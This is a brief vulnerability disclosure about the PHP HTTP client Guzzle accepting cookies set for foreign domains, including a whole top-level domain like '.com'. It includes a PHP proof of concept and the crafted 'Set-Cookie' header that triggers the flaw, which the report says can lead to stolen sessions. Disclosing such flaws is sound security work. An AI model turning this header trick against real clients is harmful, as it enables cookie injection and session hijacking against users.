Set cookie for different domain in guzzle/guzzle
May 9th 2022
It is not checked if the cookie domain equals the domain of the server which sets the cookie via the Set-Cookie header.
Proof of Concept
require "vendor/autoload.php"; $client = new \GuzzleHttp\Client(["cookies" => true]); $client->request("GET", "https://<id>.free.beeceptor.com/setcookie"); $cookies = $client->getConfig('cookies')->toArray(); print_r($cookies);
You can use beeceptor to mock the endpoint, just add the following header to the response:
"Set-Cookie": "poc=1; Domain=huntr.dev"
Also works with
.com as domain, this would send the cookie to all .com domains.
The vulnerability is capable of stealing sessions if the right conditions are met.